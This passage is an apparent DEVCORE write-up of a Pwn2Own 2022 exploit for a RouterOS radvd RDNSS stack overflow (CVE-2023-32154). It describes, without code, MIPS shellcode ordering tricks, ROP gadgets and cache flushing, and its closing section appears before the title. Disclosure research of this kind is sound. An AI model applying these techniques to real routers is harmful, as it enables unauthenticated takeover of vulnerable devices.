Through the above analysis, we found a pattern of race conditions in the remote object mechanism of RouterOS:

  • Use non-blocking methods to create/delete the remote object
  • Subscribe to the remote object

Because it is possible to mix the results of two requests into a single response, this could possibly be used to bypass some security checks. If we had found such a vulnerability, we could have used it to enter the LAN side of the router category.

In the end, we were pressed for time and we didn’t find any exploitable vulnerabilities through the race condition.

On top of that, we realized that the exploit we had tested hundreds of times over the past few months still had some issues, and three hours before the registration deadline we still could not get it to work. We kept updating the exploit and the white paper we were going to submit, and only finished half an hour before the deadline (4:00 AM).

But luckily, we were able to complete the attack with only one attempt at Pwn2Own, becoming the first team in history to complete the new category of SOHO SMASHUP:

We earned 10 Master of Pwn points and $100,000 in this category, and at the end of the contest, DEVCORE was crowned the winner with 18.5 Master of Pwn points.

In addition to the Master of Pwn title, trophy, and jacket, the organizers also send us one of each of the devices we hacked.

(We can’t fit all of them into a picture)

Conclusion

In this study, we have explored RouterOS in depth and revealed a security vulnerability that has been hidden in RouterOS for nine years. In addition, we found a design pattern in IPC that leads to a race condition. Meanwhile, we also open-source the tools used in the research at https://github.com/terrynini/routeros-tools for your reference.

Through this paper, DEVCORE hopes to share our discoveries and experiences to help white hat hackers gain a deeper understanding of RouterOS and make it more understandable.

Pwn2Own Toronto 2022 : A 9-year-old bug in MikroTik RouterOS

TL;DR

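During the Pwn2Own Toronto 2022 contest, the DEVCORE research team studied an attack surface that had received little attention and found a WAN-side vulnerability that had existed for nine years in RouterOS, the operating system used by MikroTik routers. By chaining it with a Canon printer vulnerability also discovered by DEVCORE, we became the first team in Pwn2Own history to succeed in the SOHO Smashup category. DEVCORE went on to win Pwn2Own Toronto 2022 and was awarded the title of Master of Pwn.

The WAN-side vulnerability lies in the radvd program of RouterOS. When processing ICMPv6 packets for IPv6 SLAAC, radvd does not check the length of the RDNSS field, so an attacker can trigger a buffer overflow by sending two Router Advertisement packets. Without logging in and without any user interaction, the attacker can control the underlying Linux system with high privileges and gain full control of the router. The vulnerability is tracked as CVE-2023-32154 with a CVSS score of 7.5.

DEVCORE reported the vulnerability to MikroTik through ZDI on 2022/12/29, and it was patched on 2023/05/19. The following RouterOS releases contain the fix: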

  • Long-term Release 6.48.7
  • Stable Release 6.49.8
  • Stable Release 7.10
  • Testing Release 7.10rc6

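Introduction to Pwn2Own and SOHO Smashup

Pwn2Own is a series of contests organized by Trend Micro’s Zero Day Initiative (ZDI). Each contest selects popular products as targets according to its theme, such as operating systems, browsers, electric vehicles, industrial control systems, routers, printers, smart speakers, mobile phones, NAS devices, and network cameras. A team earns the corresponding Master of Pwn points and prize money if it can demonstrate an attack and take control of a device that is in its default state and running the latest software, without any user interaction. At the end of the contest, the team with the most Master of Pwn points wins and is crowned Master of Pwn.

Because of the pandemic, working from home and SOHO (small office/home office) setups have become very common in recent years. Pwn2Own Toronto 2022 therefore added a special category called SOHO Smashup, in which contestants must compromise a router from the WAN side and then use it as a pivot to attack common household devices such as smart speakers and printers.

Besides offering the second-highest prize of all categories, $100,000 (USD), this new category also carries the highest score: 10 points. Winning it is a huge boost for any team aiming at the championship. For this contest DEVCORE deliberately chose MikroTik, a less-studied target, to avoid finding the same bugs as other teams (a collision halves both the prize and the points) and to maximize our chance of winning.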

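Introduction to RouterOS

RouterOS, developed by MikroTik, is an operating system based on the Linux kernel and the default operating system on MikroTik’s RouterBoard products. It can also be installed on a PC to turn the PC into a router.

RouterOS does use GPL-licensed open source software. However, according to the downloadterms page on the official website, to obtain the related source code you have to send 45 US dollars to MikroTik, and they will mail you a CD with the GPL source burned onto it. What an interesting idea! Fortunately, someone has already uploaded MikroTik’s GPL source to GitHub, but after reviewing it we concluded that the code was not much help for our later analysis.

RouterOS v7 and RouterOS v6

The download page on MikroTik’s website offers both RouterOS v7 and RouterOS v6. The two are more like different branches of RouterOS and are largely similar in design. Because our target device, the RouterBoard RB2011UiAS-IN, ships with RouterOS v6 by default, we studied RouterOS v6 first.

RouterOS does not officially provide a way for users to manage the underlying Linux system directly. Users are confined to a restricted console and can only manage the router with the limited set of commands RouterOS provides. As a result, a good deal of past research has focused on how to jailbreak RouterOS.

Binaries on RouterOS communicate through an IPC mechanism built by MikroTik, which exchanges information between programs using a data structure called the nova message. We therefore refer to these binaries collectively as nova binaries.

RouterOS also has a rather unusual attack surface. In everyday use, users can manage RouterOS remotely from a Windows computer with WinBox, a GUI management tool that works by sending nova messages to the router over TCP. If RouterOS fails to verify the privileges of a nova message properly, an attacker could compromise the router remotely by sending a TCP packet carrying a malicious nova message. However, WinBox is only reachable from the LAN side by default, so it was not a priority for us: our goal this time was to attack from the WAN side!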

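CVE Review

To get familiar with the attack surface of RouterOS, we first reviewed all past CVEs. At the time there were 80 CVEs related to RouterOS, of which 28 targeted the router itself and could be used in a pre-auth scenario.

Of these 28 CVEs, 4 fit the scenario described by the Pwn2Own rules: they let an attacker spawn a shell on the router or log in as admin without user interaction. Three of the four were discovered between 2017 and 2019, and three were found “in the wild” rather than being reported first by white hat hackers. The four vulnerabilities are:

  • CVE-2017-20149: Also known as Chimay-Red, one of the RouterOS exploits in “Vault 7”, the CIA arsenal leaked in 2017. The bug occurs when RouterOS parses an HTTP request: a negative Content-Length in the HTTP headers causes an integer underflow, which, combined with the Stack Clash technique, gives control of the program flow and leads to RCE.
  • CVE-2018-7445: A buffer overflow in RouterOS’s own SMB implementation. It was found through black-box fuzzing and is the only one of the four that was reported by its discoverer. It also allows control of the execution flow and ultimately RCE, but SMB is not enabled by default.
  • CVE-2018-14847: Another RouterOS exploit from “Vault 7”. It lets an attacker read arbitrary files without logging in. That may not sound serious at first, but early versions of RouterOS stored user passwords in a file as password xor md5(username + "283i4jfkai3389"), so an attacker who can read this file can recover the admin password.
  • CVE-2021-41987: A heap buffer overflow in the base64 decoding of the SCEP service, caused by a length miscalculation. Security researchers reconstructed it by analyzing an exploit found on an APT group’s C2 server.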
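To make the CVE-2018-14847 entry more concrete, here is a minimal sketch of why the stored form password xor md5(username + "283i4jfkai3389") is reversible. Only the formula comes from the text; the function name, the repetition of the 16-byte MD5 digest for longer passwords, and the sample credentials are assumptions made for illustration.

```python
import hashlib

SALT = b"283i4jfkai3389"  # constant quoted in the text above


def xor_with_user_key(username: bytes, data: bytes) -> bytes:
    """XOR data with md5(username + SALT); applying it twice restores the input."""
    key = hashlib.md5(username + SALT).digest()
    # Assumption: the 16-byte digest is repeated when data is longer than the key.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


stored = xor_with_user_key(b"admin", b"hunter2")     # what would sit in the file
recovered = xor_with_user_key(b"admin", stored)      # what an attacker computes
print(recovered)
```

Because XOR is its own inverse and the key depends only on the username and a fixed constant, anyone who can read the file needs no secret to recover the password.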

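Most of these vulnerabilities were found “in the wild”, so we have no way of knowing how their discoverers approached the analysis. There is therefore little we can learn from them about ideas or techniques for analyzing RouterOS.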

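Related Research Review

We went on to study publicly available research. At the time of the contest, we had the following articles and talks to refer to:

Review of IPC and Nova Message

Most of the research above revolves around RouterOS’s custom IPC, so we also briefly reviewed how it works. Here is a simple example to illustrate the IPC.

In everyday use, a user can log in to RouterOS via telnet and manage the router through the console.

Let us break down the parts of this flow in which IPC is involved:

  1. When the user accesses the RouterOS console via telnet, the telnet process uses execl to run the login program, which asks the user for a username and password.
  2. After the user submits the credentials, the login process puts them into a nova message and sends it to the user process for verification.
  3. After verifying them, the user process reports the result through a nova message.
  4. If the login succeeds, the console process is spawned, and all subsequent interaction between the user and the console is relayed by the login process.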

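Introduction to IPC

The example above describes the basic concept of the IPC, but communication between two processes is actually more complicated. First, every nova message destined for another program is sent through a socket to the loader, and the loader then dispatches it to the corresponding nova binary based on its content.

A simple example: suppose the id of the login process is 1039, the id of the user process is 13, and the handler responsible for verifying credentials in the user process has id 4. During login verification, the login process first sends a request containing the username and password to the user process. At this point SYS_TO is an array of two elements, [13, 4], meaning the message should go to the handler with id 4 in the process whose binary id is 13.

When the loader receives the message, it removes the 13 representing the target binary id from SYS_TO, adds the source binary id, 1039, to SYS_FROM, and forwards the message to the user process.

The user process does something similar on receipt: it removes the 4 representing the target handler id from SYS_TO and passes the nova message to handler 4, which finally executes the verification logic.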
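The two routing hops above can be sketched as follows. This is an illustrative model, not RouterOS code: the message is a plain dict, and the function names `loader_route` and `binary_dispatch`, the `payload` key, and the choice to prepend the sender to SYS_FROM are all assumptions.

```python
def loader_route(message, sender_id):
    """Model the loader: pop the target binary id from SYS_TO and record the sender."""
    sys_to = list(message["SYS_TO"])
    target_binary = sys_to.pop(0)
    routed = dict(message)
    routed["SYS_TO"] = sys_to
    # Assumption: the sender id is placed at the front of SYS_FROM.
    routed["SYS_FROM"] = [sender_id] + list(message.get("SYS_FROM", []))
    return target_binary, routed


def binary_dispatch(message):
    """Model the receiving binary: pop the handler id, or return None if SYS_TO is empty."""
    sys_to = list(message["SYS_TO"])
    handler_id = sys_to.pop(0) if sys_to else None
    delivered = dict(message)
    delivered["SYS_TO"] = sys_to
    return handler_id, delivered


# login (id 1039) asks handler 4 of the user process (id 13) to verify credentials.
request = {"SYS_TO": [13, 4], "payload": {"user": "admin"}}
target, routed = loader_route(request, sender_id=1039)
handler, delivered = binary_dispatch(routed)
print(target, handler, delivered["SYS_FROM"])
```

Each hop consumes one element of SYS_TO, so the address list shrinks as the message gets closer to the handler that finally processes it.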

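Introduction to Nova Message

The nova message used in the IPC above is initialized and populated by nv::message and its related functions. A nova message consists of typed key-value pairs whose keys can only be integers, so keys such as SYS_TO and SYS_FROM are simply macros. The available types are u32, u64, bool, string, bytes, IP, and nova message (which means nova messages can be nested).

Since RouterOS no longer uses JSON to transmit nova messages, we only describe the binary format. During IPC, the receiving socket first gets an integer giving the length of the nova message, followed by the nova message in binary form.

A nova message starts with two magic bytes: M2. Each key is then described by 4 bytes, where the first 3 bytes are the key id and the last byte is the key type. Depending on the type, the bytes that follow are parsed in a different way and extracted as data. The next key comes right after the data, and so on. The bool type is a special case: since a bool fits in a single bit, the lowest bit of the type byte directly encodes True/False. For a more detailed description of the format, see Ian Dupont, Harrison Green. Pulling MikroTik into the Limelight.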
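As a rough illustration of the layout described above, the sketch below checks the M2 magic and splits the first 4-byte key descriptor into a key id and a type byte. The little-endian byte order, the function name `parse_first_key`, and the sample bytes are assumptions; the text does not specify them, and the per-type data parsing is deliberately left out.

```python
def parse_first_key(blob: bytes):
    """Return (key_id, type_byte) for the first key of a binary nova message."""
    if blob[:2] != b"M2":
        raise ValueError("missing M2 magic")
    header = blob[2:6]
    if len(header) < 4:
        raise ValueError("truncated key header")
    # Assumption: the 3-byte key id is stored little-endian.
    key_id = int.from_bytes(header[:3], "little")
    type_byte = header[3]
    return key_id, type_byte


# Made-up sample: magic, then a key descriptor with id 0xff0001 and type byte 0x88.
sample = b"M2" + bytes([0x01, 0x00, 0xFF, 0x88])
key_id, type_byte = parse_first_key(sample)
print(hex(key_id), hex(type_byte), "lowest type bit:", type_byte & 1)
```

A full parser would continue by reading the data that follows according to the type byte and then looping to the next key descriptor.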

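x3 format

To find out which nova binary an id in SYS_TO or SYS_FROM refers to, we need to parse files with the x3 extension, which are XML in a binary format. After writing a tool to parse /nova/etc/loader/system.x3, we can look up the nova binary for each id. In the figure below, for example, the id of /nova/bin/log is 3.

Some binary ids are not in this file, because the binary may only be available after installing an official MikroTik package. In that case the id is found in /ram/pckg/<package_name>/nova/etc/loader/<package_name>.x3. radvd is one example.

Even so, some binary ids cannot be found in any .x3 file because the corresponding processes are not persistent. One example is the login process, which is spawned only when a user tries to log in. Such processes use a serial number as their id.

.x3 files are also used to store settings of nova binaries. For example, www uses an .x3 file to specify which servlet handles each URI.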

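Summary

Reviewing past research and CVEs shows that most of the vulnerabilities we are interested in are concentrated in one past period, and pre-auth vulnerabilities on the WAN side of RouterOS seem hard to find these days. Vulnerabilities have continued to be disclosed, but MikroTik has clearly been getting more secure. Are there really no pre-auth vulnerabilities left on MikroTik? Or has everyone simply overlooked something?

The public research mentioned above falls roughly into three categories:

  • Jailbreaking
  • Analysis of in-the-wild exploits
  • Research on nova messages in the IPC

After reverse engineering the binaries on RouterOS for a while, however, we realized that the system is more complex than that, yet hardly anyone mentions the details. This led us to the following thought: “No one in their right mind wants to spend time reverse engineering nova binaries.”

Apart from the exploits obtained from the CIA and APT groups, most vulnerability research on RouterOS comes down to fuzzing network protocols, tampering with nova messages, or fuzzing nova messages. Judging by the results, attackers seem to understand RouterOS far better than we do. To close the gap and have a chance of finding the bug we want, we need to explore nova binaries in more detail. We have nothing against fuzzing, but to gain an edge in this contest we had to make sure we had looked at every detail with our own eyes.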

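Where to Begin

We do not believe RouterOS is flawless, and it is not hard to see the gap between researchers’ and attackers’ understanding of it. So what are we missing to find a pre-auth RCE on RouterOS?

The first question that came to mind was: where are the entry points of the IPC, and where do they lead? Most functions triggered through IPC require login, so we can expect that sticking to IPC will only turn up more post-auth vulnerabilities. Besides, IPC is just one of the pieces RouterOS uses to implement its main features. We would rather examine the core code of each feature directly and carefully.

For example, how does the process that handles DHCP extract the information it needs from a DHCP packet? That information may be stored in the process itself, or it may be sent to other processes through IPC for further handling.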

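The Architecture of Nova Binary

We therefore first need to understand the architecture of a nova binary. Every nova binary has a Looper (or its derived class, MultifiberLooper), a class that runs the event loop. In each iteration it calls runTimer to execute timers that have expired and calls poll to check the state of its sockets and handle them accordingly.

The Looper is also responsible for communication between its nova binary and the loader. It first registers a special callback function, onMsgSock, for the unix socket between the binary and the loader. This function dispatches nova messages received from the socket to the corresponding handler in the nova binary.

The Handler Class and Its Derived Classes

When the Looper receives a nova message, it dispatches the message to the corresponding handler. For example, a message whose SYS_TO is [14, 0] is routed by the loader to the nova binary with binary id 14. By the time the looper in that binary receives it, SYS_TO is down to [0], so the looper hands it to handler 0. If the original SYS_TO is [14], the looper sees an empty SYS_TO ([]), and the Looper handles the message itself.

Now suppose the Looper receives a nova message meant for handler 1 and dispatches it there. On receiving the message, handler 1 calls nv::Handler::handleCmd of the Handler class, which looks up the function matching the message’s SYS_CMD in the vtable and executes it.

In addition to the regular functions, cmdUnknown in the vtable is often overridden by developers to add functionality. Sometimes, though, they override handleCmd instead; it seems to depend entirely on the mood of the MikroTik developer. Because Handler is a base class, the object-related commands are not implemented in it.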

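Derived Classes

The class used most in nova binaries is not the basic Handler class but its derived classes. A derived class can store multiple objects of a single type, much like a C++ STL container.

For example, when a user creates a DHCP server through the web panel, a nova message with the command “add object” is sent to handler 0 of the dhcp process. Handler 0 then creates a dhcp server object to record the settings, and the object is kept in a tree inside handler 0.

Handler 0 here is an instance of AMap, which is a derived class of Handler. Because the command is “add object”, the member function AMap::cmdAddObj is triggered. It calls the function pointed to by offset 0x7c of handler 0’s vtable, which is in fact the constructor of the objects contained in the AMap. For example, if the developer declares handler 0 as AMap<string>, the function at offset 0x7c is the constructor of string.

The vtable offset that holds the inner object’s constructor differs for each derived class. To find the constructor of the objects in a derived class, reverse engineer that class’s cmdAddObj.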

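IPC, and Beyond IPC

IPC seems to be everywhere, but many features in RouterOS are not implemented through it. Take the two layer 2 discovery protocols implemented in the discover program, CDP and LLDP:

  1. When the two services are enabled, handler 0 in discover calls nv::createPacketReceiver to open the sockets used by CDP and LLDP and registers a callback function for each.
  2. In every iteration of the Looper, the program uses poll to check whether the CDP and LLDP sockets have received packets.
  3. If a packet has arrived, the corresponding callback function is called to handle it.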
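The register, poll, and callback pattern in the three steps above can be sketched with Python’s standard `selectors` module. This is only an analogy for the flow: the helper names (`run_once`, `on_packet`) and the use of a local socket pair in place of a real CDP/LLDP socket are assumptions for illustration.

```python
import selectors
import socket


def run_once(selector, timeout=1.0):
    """One loop iteration: poll the registered sockets and call their callbacks."""
    for key, _events in selector.select(timeout):
        callback = key.data          # the callback registered for this socket
        callback(key.fileobj)


received = []


def on_packet(sock):
    """Callback: parse the packet and store the result locally, no IPC involved."""
    received.append(sock.recv(4096))


selector = selectors.DefaultSelector()
rx, tx = socket.socketpair()                     # stand-in for the protocol socket
selector.register(rx, selectors.EVENT_READ, on_packet)

tx.send(b"fake discovery frame")                 # a packet arrives from the network
run_once(selector)
print(received)

selector.unregister(rx)
rx.close()
tx.close()
```

The point of the pattern is that the packet goes from the socket straight into the callback, so nothing in this path is reachable by sending nova messages.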

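The CDP callback is very simple: it checks that the interface on which the packet arrived is allowed, and if so, parses the packet, stores the information directly in an nv::ASecMap, and returns. No nova message is used in the process.

In scenarios like this, IPC can do nothing beyond enabling the CDP or LLDP service (which is on by default); it cannot trigger any CDP or LLDP functionality. Earlier research that focused on IPC is therefore likely to have missed program logic implemented this way.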

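The Story of the Pre-Auth RCE

Our understanding of RouterOS, together with a pleasant accident, led us to a long-hidden vulnerability.

One day before the contest, while plugging and unplugging the network cable as usual during reverse engineering and debugging on RouterOS, we noticed that the log file showed the radvd program had crashed several times! We tried to reproduce the crash by plugging and unplugging the cable manually with a debugger attached to locate the fault. After more than a thousand attempts, however, we still could not determine the conditions for the crash and could only watch it happen at random.

After struggling for a while, we gave up on locating the bug through blind trial and switched to static reverse engineering of radvd to find where it crashed. We never found the root cause of the crash, but thanks to our understanding of nova binaries, we found another, exploitable vulnerability in radvd.

Before introducing this vulnerability, we need to explain what the radvd process is responsible for.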

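SLAAC (Stateless Address Auto-Configuration)

In short, radvd is the service that handles SLAAC for IPv6.

In a SLAAC environment, a computer that wants an IPv6 address to access the network first sends an RS (Router Solicitation) request to all routers. When a router receives the RS, it advertises the network prefix through an RA (Router Advertisement). A computer that receives the RA can then derive its own IPv6 address from the network prefix and its EUI-64.

Suppose an ISP or network administrator wants to assign a network segment to a customer so that the customer can hand out addresses to their own machines. With SLAAC alone and no DHCP, how is a segment assigned to the user? SLAAC has no way to delegate directly, so it usually works like this:

Suppose there is an upstream router, Router A, which belongs to the ISP or network administrator, plus a Router B managed by the customer and a computer managed by the customer. The ISP or administrator informs the customer in advance, by email, of a /48 network prefix assigned to them; assume it is 2001:db8::/48. The customer configures it on Router B. When the computer sends an RS to Router B, Router B returns this prefix in its RA. This prefix is called the routed prefix.

Meanwhile, for the customer’s Router B to communicate with Router A, it also needs an IPv6 address of its own. The network prefix that Router B obtains from Router A is called the link prefix.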

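Execution Flow of radvd

  1. When the radvd process starts, it calls nv::ThinRunner::addSocket to open the socket used by radvd and registers the corresponding callback function.
  2. In every iteration of the Looper, poll is used to check whether the socket has received a packet.
  3. If a packet has arrived, the corresponding callback function is called to handle it.

In the radvd callback, it first checks whether the packet is a valid RA or RS. For an RA, it stores the information; for an RS, it starts broadcasting an RA to the LAN.

There are three situations in which RouterOS broadcasts a prefix to the LAN:

  1. An RS packet is received from the LAN
  2. An RA packet is received from the WAN
  3. An RA packet is broadcast on the LAN periodically (by default after a random interval of 200 to 600 seconds)

Through static analysis of the callback we could not immediately find where the RA is sent in case 2, and at the time we were not sure why. We later found that this behavior is tied to the subscription mechanism in RouterOS IPC, which we explain in a later section and which is also related to the race condition we discovered. The other two cases, however, can be found directly through static analysis.

In case 1, when an RS is received from the LAN, radvd calls sendRA to broadcast an RA packet:

In case 3, handler 1 registers a timer, RAroutine, after it is initialized:

RAroutine calls sendRA at intervals to broadcast the packet: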

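CVE-2023-32154

The common function in both cases is sendRA. After analyzing sendRA in depth, we found a weakness in the way radvd handles DNS advisories.

radvd first stores the DNS advisories from RAs received from upstream (using a tree as the data structure). When the router broadcasts an RA to the LAN, these DNS entries are also packed into the RA and broadcast to the machines on the LAN. In radvd, the function addDNS expands the DNS tree and places it into the ICMPv6 packet. The first argument passed to addDNS, RA_raw, is a 4096-byte buffer that becomes the ICMPv6 packet eventually sent.

Following addDNS, we can immediately see a possible stack buffer overflow: addDNS copies the DNS entries into the ICMPv6 packet with memcpy and performs no boundary check, so supplying enough DNS advisories triggers a stack buffer overflow.

The DNS entries come from the RDNSS field of the RA packet. According to the RFC, however, the field that describes the RDNSS length is only 8 bits wide, so we can overwrite at most 255*16 bytes, which is not enough to reach the return address.

But if this is not the first RA that radvd has received, radvd has to mark the old DNS entries as expired in the following packet, so we can actually overwrite twice that length, 255*16*2 bytes, which is enough to overwrite the return address.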
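The size argument above is simple arithmetic, worked through below with the figures quoted in the text (255 entries of 16 bytes each, and a 4096-byte RA_raw buffer). The constant names are made up for illustration, and the sketch ignores the other fields that also occupy the buffer.

```python
RDNSS_MAX_ENTRIES = 255   # figure used in the text for an 8-bit length field
IPV6_ADDR_SIZE = 16       # bytes per IPv6 address
RA_BUFFER_SIZE = 4096     # size of the RA_raw stack buffer

one_packet = RDNSS_MAX_ENTRIES * IPV6_ADDR_SIZE   # bytes copied after one RA
two_packets = 2 * one_packet                      # old (expired) + new entries

print(one_packet, one_packet > RA_BUFFER_SIZE)    # stays inside the buffer
print(two_packets, two_packets > RA_BUFFER_SIZE)  # runs past the buffer
print("bytes written past the buffer:", two_packets - RA_BUFFER_SIZE)
```

One packet’s worth of addresses fits just under the buffer size, while two packets’ worth goes far beyond it, which is why the attack needs the second RA.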

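Attack Flow

With this weakness, we only need to send the target RouterOS two malicious RA packets whose RDNSS length field is 255, and we can use the IPv6 addresses in RDNSS to control the execution flow of radvd.

Protections

Because RouterOS here runs on the MIPS architecture, the CPU does not support NX, and no other protections are enabled either. All we need is a usable ROP gadget that makes execution jump to the shellcode we place on the stack. It sounds extremely simple.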

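Shellcode Constraints

Building the exploit comes with quite a few constraints, though. For example, the IPv6 addresses are stored in a tree, so they are sorted before being placed on the stack. We must therefore make sure that our payload is still the shellcode we built after it has been sorted.

The simplest approach is to use the IPv6 prefix as a serial number, which guarantees that the content stays in order, and then jump to the second half of the shellcode with a ROP gadget. When writing the shellcode, we just make the suffix of each address a jump that skips over the non-executable serial number.

However, because of the delay slot mechanism in MIPS, the CPU actually executes the instruction after the jump first.

So the jump has to be moved forward, which raises the next problem: the syscall instruction cannot be used in a delay slot. In this situation the payload is not only painful to construct but may also exceed the length available to us, so this was a bad idea from the start.

Sharp-eyed readers will have noticed that this is really a common beginner-level CTF problem: just make the prefix a valid instruction that does not affect the result. We changed the prefixes to addi s8, s0, 1, addi s8, s0, 2, addi s8, s0, 3, and so on. The payload then stays in sorted order, and we also save the space originally needed for the jump instructions.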
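The sorting trick can be illustrated with a short sketch that encodes `addi $s8, $s0, n` as the first four bytes of each 16-byte address and checks that bytewise sorting keeps the chunks in their original order. The big-endian encoding, the bytewise sort order of the tree, the 12-byte chunking, and the helper names are assumptions made for illustration; the placeholder bytes are not real shellcode.

```python
import struct


def addi_s8_s0(n: int) -> bytes:
    """Encode MIPS `addi $s8, $s0, n` as a big-endian 32-bit word."""
    opcode, rs, rt = 0x08, 16, 30            # addi, $s0 is r16, $s8 is r30
    word = (opcode << 26) | (rs << 21) | (rt << 16) | (n & 0xFFFF)
    return struct.pack(">I", word)


def build_addresses(body: bytes):
    """Split body into 12-byte pieces and prefix each with a numbered addi."""
    pieces = [body[i:i + 12] for i in range(0, len(body), 12)]
    # Pad the last piece with zero bytes, which decode as nop on MIPS.
    return [addi_s8_s0(i + 1) + p.ljust(12, b"\x00") for i, p in enumerate(pieces)]


placeholder = bytes(range(40))               # stand-in for the real instructions
addresses = build_addresses(placeholder)

print(addi_s8_s0(1).hex())
print(sorted(addresses) == addresses)        # sorting leaves the order unchanged
```

Since the immediate grows with every chunk, the prefix acts as a serial number while still being a harmless instruction that the CPU can execute on its way through the payload.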

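We still need to tweak the payload a little. We have no bug that leaks a stack address, and we could not find any usable gadget to move the stack address from the $sp register to the $t9 register. So what we do is this: first, write a jalr $sp instruction to a piece of memory with a ROP gadget, then jump to it with another ROP gadget. This redirects execution to our shellcode, and the future looks bright:

That alone is not enough to run the shellcode, however, because MIPS uses two separate caches for memory access.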

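cache

MIPS has two caches: the I-cache (instruction cache) and the D-cache (data cache).

When we write the jalr $sp instruction to memory, it actually lands in the D-cache.

When we then redirect execution to the address of jalr $sp, the processor first checks whether the instruction at that address is in the I-cache. The address lies in the data section and is never executed in the normal flow, so the cache always misses, and the processor loads the content of memory into the I-cache.

At this point the content of the D-cache has not been written back to memory, so the I-cache only picks up a run of null bytes, which are nops on MIPS. The program just executes meaningless nops until it crashes.

We need to make the processor write the D-cache back to memory. There are two ways to do this: a context switch, or using up the entire D-cache (32 KB). Triggering a context switch is the simpler option, but radvd has no sleep that we can use for that. Other functions do trap into the kernel, but the chance of a context switch is low. To compete for the Pwn2Own title, the attack must succeed close to 100% of the time, so we looked for a way to exhaust the 32 KB of D-cache instead.

A quick check shows that randomize_va_space on RouterOS is set to 1, which means heap addresses are not randomized and we know where the heap is without a leak. All we need is to make the heap allocate enough space and then write some junk to it to exhaust the 32 KB D-cache! However, radvd does not have many convenient ROP gadgets, so building such a payload takes a longer chain of gadgets, and the final payload may exceed the length we can overwrite.

Fortunately, as mentioned earlier, the DNS entries are stored in a tree, so they already occupy a large chunk of heap memory. Stepping through with gdb, we confirmed that the heap is already larger than 32 KB when the DNS entries are processed! So we only need to call memcpy through a GOT hijack to write 32 KB of junk to the heap!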

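With that, our exploit is complete:

Combined with the Canon printer vulnerability we found for Pwn2Own, the attack flow is:

  1. As a bad neighbor of the router, the attacker sends it malicious ICMPv6 packets.
  2. After taking control of the router, we set up port forwarding to direct the payload to the Canon printer on the LAN.

In the Pwn2Own contest environment, the network setup can be simplified further, as follows: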

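Debugging the Exploit

Just when we thought the $100,000 prize was in the bag, something incredible happened: our attack failed whenever it was run from Ubuntu, whether in a virtual machine on macOS or on a physical Ubuntu machine. Pwn2Own officials essentially use Ubuntu to run the exploits, so we had to solve this problem.

We ran the exploit on macOS while recording the network packets and then replayed the traffic on Ubuntu. The replay failed:

We also ran the exploit on Ubuntu and recorded the packets. It failed on Ubuntu, of course, but when we replayed the failed traffic on macOS, it succeeded:

At this point we guessed that one of the operating systems reorders packets before sending them, and that the reordering happens after Wireshark captures them, which would explain why Wireshark did not record it. So we wrote a sniffer and ran it on the router to monitor the traffic. Since AF_PACKET sockets are not affected by firewall rules, the result should be very reliable:

However, the packets captured on both sides were exactly the same...

So the exploit had only ever succeeded on my macOS machine. If the situation could not be resolved, the only option was for me to fly to Toronto with my Mac laptop and run the attack from it on site. But we could not leave a problem of unknown cause unresolved. Who knows whether it would also happen on my laptop during the contest? That would be a huge loss.

After several careful reviews, we finally found the cause: speed. The interval between the two RA packets is small, so it is hard to see directly on the Wireshark timeline, but a quick calculation shows that the time taken on the two systems differs by a factor of 390. The problem was not Ubuntu at all. The Mac sent the two packets so fast that it accidentally triggered a race condition in radvd. (On top of that, being extremely lazy, I had not properly calculated how many bytes it takes to reach the return address. I just filled the buffer with junk and did a pattern match, so the offset was only correct when the race occurred.)

The fix is to sleep between sending the two RA packets and to correct the offset in the payload to the one observed without the race. This stabilizes our attack script and raises the success rate to 100%.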

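Fix

The vulnerability has been fixed in the following releases:

  • Long-term Release 6.48.7
  • Stable Release 6.49.8, 7.10
  • Testing Release 7.10rc6

We also found that the vulnerability has existed since RouterOS v6.0. According to the official website, 6.0 was released on 2013-05-20, which means the vulnerability sat there for nine years without anyone discovering it.

This echoes our initial thought: “No one in their right mind wants to spend time reverse engineering nova binaries.” Q.E.D.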

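The race condition

But how did this race condition, which got in the way of our easy $100,000, come about? As mentioned earlier, a nova binary has a Looper that checks in a loop for events, which means the program is single-threaded. So where does a race condition come from? (Some nova binaries are multi-fiber, but radvd is not.)

This brings us to a detail we have not mentioned yet. When radvd parses an RA packet received from the WAN, the DNS entries are stored in a “vector”. When preparing the RA packet to broadcast on the LAN, however, addDNS expands a “tree” that stores the DNS entries. So how are the vector and the tree related, and how is one converted into the other?

This is also why we did not immediately find the logic for “broadcast an RA to the LAN when an RA is received from the WAN” in the callback: it is the result of a complicated interaction between two processes.

Looking closely at what the callback does, we can see an array that holds objects called “remote objects”. The code looks straightforward: it iterates over the vector of DNS addresses, calls nv::roDNS once for each address, and saves the result in the DNS_remoteObject vector.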

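remote object

So what is a remote object? It is a mechanism in RouterOS for sharing resources across processes: one process stores the shared resource, and another process can send requests to it, specifying ids, to create, delete, query, and modify entries. For example, the DNS remote objects actually live in handler 2 of the resolver process, while handler 1 of radvd merely keeps the ids of these objects.

subscription and notification

When a remote object is updated, some processes may want to react, so a nova binary can subscribe in advance, through IPC, to remote objects in other nova binaries. Take dhcp and ippool6 as an example. Handler 1 in ippool6 manages the ipv6 address pool, and the dhcp process subscribes to it. When the ipv6 address pool changes, dhcp can check whether the change requires further action, such as shutting down a dhcp server.

A subscription is made by sending a nova message with the subscribe command to the binary you want to subscribe to. Its SYS_NOTIFYCMD field contains the specific conditions to be notified about.

In the situation above, when another process adds an object to ippool6, the cmdAddObj function of handler 1 is executed.

In most cases, AddObj calls sendNotifies to notify the subscribers of the 0xfe000b event that the object they subscribed to has changed. So here ippool6 sends a nova message to the dhcp process with the result of the change.

With the subscription mechanism understood, we can describe the interaction between radvd and resolver more completely:

After radvd receives an RA packet from the WAN, it calls roDNS for each IPv6 address to ask resolver to create the corresponding remote object. Handler 4 in resolver handles this request and creates the corresponding ipv6 object in handler 2. Because handler 1 of radvd subscribes to handler 2 of resolver, handler 2 of resolver pushes all the DNS addresses it currently holds to handler 1 of radvd. Handler 1 then builds an RA packet from the DNS addresses it received and broadcasts it on the LAN.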

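Root Cause of the Race Condition

The race condition actually stems from the implementation of roDNS. roDNS sends its nova message with postMessage, which is non-blocking, so the remote object in radvd does not immediately know its corresponding id in resolver.

If the second packet arrives so soon that radvd does not yet know the id of the remote object, radvd cannot actually delete these objects right away. It can only mark them as destroyed for soft deletion, and this is what gives rise to the race condition.

Let us walk through the whole process step by step:

First, since both processes are single-threaded, we can assume that radvd and resolver are each running their first loop.

When radvd receives an RA from the WAN containing a single DNS address, it sends resolver a request to create a remote object.

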